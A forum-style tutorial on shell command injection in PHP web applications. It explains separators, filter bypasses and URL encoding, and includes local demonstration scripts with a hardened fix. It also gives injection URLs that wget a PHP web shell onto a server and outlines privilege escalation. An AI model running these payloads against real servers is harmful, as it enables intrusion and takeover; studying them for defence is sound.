Shell/Command Injection


What you will need:

  • At least a basic knowledge of unix systems
  • A brain

[0x0a]Overview:
The whole point of command injection is to get the vulnerable application to execute commands chosen by the attacker. Web applications frequently hand work off to backend programs (cat, ls, ping, image converters and so on) by way of a shell. That becomes disastrous when the developer passes user input into the shell command string without sanitizing or escaping it: the shell parses the attacker's input as part of the command, and the attacker gets code execution with the privileges of the web server process.

Example of poor, lazy coding:

<?php
// $_GET['filename'] is concatenated straight into a shell command string
echo shell_exec('cat '.$_GET['filename']);
?>

Why is this a problem?
I'm glad you asked. In case you don't know PHP: shell_exec() hands its string to /bin/sh, and this script builds that string from user input with no sanitization or escaping at all. Whatever is in the filename parameter is parsed by the shell as part of the command. In a normal situation a user might go to a link like:

www.examplesite.com/viewcontent.php?filename=example.txt

And it would display some example text:

Here is some visible content, blah blah

So all I have to do now is add a semicolon and a shell command. The browser encodes the space and the semicolon as %20 and %3B on the wire and PHP decodes them again, so the script ends up running cat example.txt; ls, which the shell treats as two separate commands:

www.examplesite.com/viewcontent.php?filename=example.txt; ls

The output would be something like:

Here is some visible content, blah blah
example.txt
config.php
IchiIsAwesome.txt
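To see the whole thing offline, here is an added example (my own, not code from the original post) that reproduces the vulnerable line in shell: a function that builds the command string by concatenation exactly as the PHP does, next to a hardened version that passes the parameter as a single argument, which is what escapeshellarg() achieves in PHP (or, better still, reading the file without a shell at all, e.g. file_get_contents() on an allow-listed name). The temp directory, example.txt and config.php are constructed sample data.

```shell
#!/usr/bin/env bash
# Added example, not the original post's code: simulates
#   echo shell_exec('cat '.$_GET['filename']);
# by handing the raw parameter to "sh -c" the way PHP's shell_exec() does,
# then shows the argument-passing fix. Assumes a POSIX sh is available.
set -u

# Constructed sample files standing in for the web root.
WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT
printf 'Here is some visible content, blah blah\n' > "$WORKDIR/example.txt"
printf '<?php $db_password = "hunter2";\n' > "$WORKDIR/config.php"

# Vulnerable: the parameter is spliced into the command string, so every
# shell metacharacter in it (; | && $( ) > ...) is parsed as shell syntax.
view_vulnerable() {
    ( cd "$WORKDIR" && sh -c "cat $1" 2>&1 )
}

# Hardened: the parameter travels as one argv entry ($1 inside the child
# shell) and is never re-parsed as syntax. "--" stops cat reading a leading
# "-" as an option. This is what escapeshellarg() buys you in PHP.
view_hardened() {
    ( cd "$WORKDIR" && sh -c 'cat -- "$1"' sh "$1" 2>&1 )
}

# Exit 0 if the directory listing shows up in the output of the given
# viewer, i.e. the injected "ls" really ran.
leaks_listing() {  # leaks_listing VIEWER_FUNCTION
    "$1" 'example.txt; ls' | grep -q '^config\.php$'
}

echo "--- vulnerable ---"; view_vulnerable 'example.txt; ls'
echo "--- hardened ---";   view_hardened   'example.txt; ls'
```

The hardened version answers the same payload with "cat: example.txt; ls: No such file or directory", because the whole string was looked up as one filename. Note that argument passing only stops the shell from parsing the input; cat will still happily read ../../../etc/passwd, so the filename also needs to be allow-listed or confined to a directory.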

[0x0b]How to perform an attack:
In the last section I showed you a basic example of how command injection works. Now we're going to talk about the different separators and operators you can inject with, and how the shell executes them.

It's reasonable to assume that a careful developer will filter out the most obvious injection character, the semicolon. Well, there are ways around that. The shell has several other ways to end one command and start another, so a blacklist that strips only one of them is not a fix. Here are some operators you can use:

Pipes
Example: |

A pipe connects the standard output of one command to the standard input of the next. The second command runs regardless of whether the first one succeeded or whether it even reads its input, so you can chain as many commands as you like with multiple pipes. For injection it is a separator like any other: cat example.txt | id runs id.

Inline commands
Example: ; and newline

The semicolon from the original example. A semicolon tells the shell to execute everything before it, then execute everything after it as if it were typed on a fresh command line. A literal newline (%0a in a URL) does exactly the same thing, which is why it is a classic bypass when only the semicolon is filtered.

Command substitution
Example: $(command) and `command`

The shell runs the command inside $( ) or backticks first and pastes its output back into the command line in its place. The injected command runs even though the original command (cat) runs too, and because the output is spliced back into the arguments it is also a way to feed the original command a value you are not allowed to type directly.

Logical Operators
Example: && and ||

These are conditional separators, not operations on data. cmd1 && cmd2 runs cmd2 only if cmd1 succeeded (exit status 0); cmd1 || cmd2 runs cmd2 only if cmd1 failed. That matters when you inject: example.txt || id never runs id, because cat example.txt succeeds, whereas a filename that does not exist followed by || id does.

How they're used:

  • `shell_command` – runs the command and substitutes its output into the command line
  • $(shell_command) – same as backticks, and can be nested
  • | shell_command – runs the command with the previous command's output as its input; you see the output of the injected command
  • || shell_command – runs the command only if the previous command failed
  • ; shell_command – runs the command unconditionally after the previous one
  • && shell_command – runs the command only if the previous command succeeded
  • > target_file – overwrites target_file with the output of the previous command
  • >> target_file – appends the output of the previous command to target_file
  • < target_file – feeds the contents of target_file to the previous command as its standard input

Remember that the payload travels inside a URL. & separates query parameters, so && has to be sent as %26%26; # starts a shell comment (handy for discarding whatever the script appends after your input) but has to be sent as %23, or the browser treats it as a fragment and never sends it; spaces become %20 or +. PHP decodes all of these before the script sees them.

These are just a few examples of command injection vectors; get creative and use your imagination. If you know what the target system runs, it shouldn't be hard.
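The list above describes each separator; the added example below (my own code, not from the original post) pushes each of them through the same cat <input> command shape the vulnerable script builds, so you can see which ones actually run the injected command, and in particular how && and || depend on whether cat succeeded. It also shows command substitution pulling config.php into cat's argument list and a redirect dropping a new file, which is the same mechanism used to land a web shell. The scratch directory and its two files are constructed sample data.

```shell
#!/usr/bin/env bash
# Added example, not the original post's code: pushes each separator from
# the list above through the same "cat <input>" command shape the
# vulnerable script builds, so you can see which ones run the injected
# command and under what condition. Assumes a POSIX sh and two constructed
# files, example.txt and config.php, in a scratch directory.
set -u

WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT
printf 'Here is some visible content, blah blah\n' > "$WORKDIR/example.txt"
printf '<?php $db_password = "hunter2";\n' > "$WORKDIR/config.php"

# The vulnerable concatenation: the raw parameter becomes shell syntax.
inject() {
    ( cd "$WORKDIR" && sh -c "cat $1" 2>&1 )
}

# Exit 0 if "echo INJECTED" actually ran for this payload.
runs_injected() {
    inject "$1" | grep -qx 'INJECTED'
}

# Exit 0 if the payload made cat dump config.php (command substitution
# pastes the inner command's output back into cat's argument list).
leaks_config() {
    inject "$1" | grep -q 'hunter2'
}

# Exit 0 if the payload created FILE in the working directory: the same
# mechanism that drops a web shell once you can redirect output.
drops_file() {  # drops_file PAYLOAD FILE
    inject "$1" >/dev/null
    [ -f "$WORKDIR/$2" ]
}

# Print a one-line verdict for a payload.
show() {  # show PAYLOAD LABEL
    if runs_injected "$1"; then v=ran; else v=skipped; fi
    printf '%-34s -> %s\n' "$2" "$v"
}

show 'example.txt; echo INJECTED'   'example.txt; echo INJECTED'
show 'example.txt | echo INJECTED'  'example.txt | echo INJECTED'
show 'example.txt && echo INJECTED' 'example.txt && echo INJECTED'
show 'example.txt || echo INJECTED' 'example.txt || echo INJECTED'   # cat succeeded, so || skips
show 'missing.txt || echo INJECTED' 'missing.txt || echo INJECTED'   # cat failed, so || runs
show 'missing.txt && echo INJECTED' 'missing.txt && echo INJECTED'
show "$(printf 'example.txt\necho INJECTED')" 'example.txt<newline>echo INJECTED'
```

Run it and the || row shows "skipped" while the missing.txt || row shows "ran": when you use || you want the first command to fail, so point it at a filename that does not exist. The newline row is the %0a bypass for a filter that only strips semicolons.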

Example:
Download a PHP shell onto the server. The && must be URL-encoded as %26%26 or it is parsed as a query-string separator and never reaches the shell. wget saves into the web server process's current working directory (normally the script's directory), which has to be writable by the web server user; that is what the ls afterwards checks.

www.example.com/viewcontent.php?filename=example.txt%26%26 wget [location of php shell]

Locate the shell

www.example.com/viewcontent.php?filename=example.txt%26%26 ls -X

Access the shell in your browser.

[0x0c]Conclusion:
Command injection is an extremely dangerous vulnerability: it gives the attacker code execution as the web server user straight away, and from there the usual path is to escalate privileges and gain complete control of the system. It usually goes something like this:

  • Drop a script on the server that serves as a web shell
  • Monitor processes and audit the system from that shell
  • Find other vulnerabilities (misconfigurations, a vulnerable kernel or setuid binary) and exploit them to gain full control

All you need to exploit this vulnerability is knowledge of the system you're exploiting, whether *nix or Windows, and patience. On Windows the same idea applies, but the separators are those of cmd.exe (&, &&, || and |); a semicolon is not a command separator there. I know it was a quick tutorial, but there's only so much I could write before it became complete and utter spoon-feeding, and no one really benefits from that. Hope you enjoyed reading. I welcome constructive criticism on what I should add or take out and tips for future tutorials, thanks.

source:z+
